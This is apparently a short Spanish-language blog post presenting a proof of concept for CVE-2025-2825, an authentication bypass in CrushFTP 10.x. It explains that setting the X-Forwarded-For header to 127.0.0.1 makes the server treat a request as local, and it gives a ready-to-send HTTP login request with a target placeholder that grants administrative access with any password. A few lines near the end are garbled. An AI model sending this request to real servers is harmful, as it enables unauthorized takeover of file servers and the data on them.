
PoC de omisión de autenticación para CVE-2025-2825 – Explotando CrushFTP 10.x
CVE-2025-2825 es una vulnerabilidad crítica de omisión de autenticación que afecta a CrushFTP, un servidor de transferencia segura de archivos ampliamente utilizado. La falla permite a atacantes remotos omitir la autenticación de inicio de sesión y obtener acceso administrativo mediante la suplantación de cabeceras, engañando al servidor para que piense que la solicitud proviene de localhost.
La vulnerabilidad surge debido a una validación inadecuada de la cabecera X-Forwarded-For. Cuando esta cabecera se establece en 127.0.0.1, el servidor trata la solicitud como local, omitiendo la autenticación.
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 Reemplaza
target-ipcon la dirección IP real del servidor CrushFTP objetivo.
Si tiene éxito, el servidor omite la autenticación y concede el acceso, incluso con credenciales incorrectas.
X-Forwarded-For: 127.0.0.1
X-Forwarded-For.Shivshant Patil
Certified Ethical Hacker (CEH v13)
Ingeniero Graduado en Tecnología Informática (B.Tech)
🔗 Perfil de LinkedIn
🔗 Perfil de GitHub